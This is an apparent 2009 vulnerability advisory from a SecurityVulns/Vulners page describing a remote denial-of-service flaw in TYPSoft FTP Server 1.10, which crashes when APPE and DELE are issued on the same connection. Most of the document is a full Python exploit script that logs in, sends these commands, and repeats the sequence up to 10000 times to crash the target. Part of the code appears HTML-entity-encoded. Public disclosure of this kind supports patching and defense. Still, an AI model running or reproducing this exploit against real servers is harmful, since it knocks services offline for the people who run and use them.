Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22837
HistoryNov 26, 2009 - 12:00 a.m.

TYPSoft FTP Server 'APPE' and 'DELE' Commands Remote DoS Vulnerabilities

2009-11-2600:00:00
vulners.com
18
JSON

Date of Discovery: 24-Nov-2009

Credits:leinakesi[at]gmail.com

Vendor: TYPSoft

Affected:
TYPSoft FTP Server Version 1.10
Earlier versions may also be affected

Overview:
TYPSoft FTP Server is an easy use FTP server Application. Denial of Service vulnerability exists in TYPSoft FTP Server when

"APPE" and "DELE" commands are used in the same socket connection.

Details:
If you could log on the server successfully, take the following steps and the ftp server will crash which would lead to

Denial of Service attack:

1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()

Severity:
High

Exploit example:

#!/usr/bin/python
import socket
import sys
import time

def Usage():
print ("Usage: ./expl.py <local_ip> <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous\n")
print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous\n")
if len(sys.argv) <> 5:
Usage()
sys.exit(1)
else:
local=sys.argv[1]
hostname=sys.argv[2]
username=sys.argv[3]
passwd=sys.argv[4]
test_string="a"*30
ip_every=local.split('.')
for i in range(1,10000):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r

    sock_data.bind&#40;&#40;local,31339&#41;&#41;
    sock_data.listen&#40;1&#41;
    
    sock.send&#40;&quot;PORT &quot; + ip_every[0] +&quot;,&quot;+ ip_every[1] +&quot;,&quot;+ ip_every[2] +&quot;,&quot; + ip_every[3] + &quot;,122,107&#92;r&#92;n&quot;&#41;
    print &quot;[-] &quot;+ &#40;&quot;PORT &quot; + local + &quot;122,107&#92;r&#92;n&quot;&#41;
    r=sock.recv&#40;1024&#41;
    print &quot;[+] &quot;+ r
        
    sock.send&#40;&quot;APPE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
    print &quot;[-] &quot;+ &#40;&quot;APPE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
    r=sock.recv&#40;1024&#41;
    print &quot;[+] &quot;+ r
    
    sock.send&#40;&quot;DELE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
    print &quot;[-] &quot;+ &#40;&quot;DELE &quot;+ test_string +&quot;&#92;r&#92;n&quot;&#41;
    r=sock.recv&#40;1024&#41;
    print &quot;[+] &quot;+ r    
     
    sock.close&#40;&#41;
    sock_data.close&#40;&#41;
    time.sleep&#40;2&#41;
            




sys.exit&#40;0&#41;;
JSON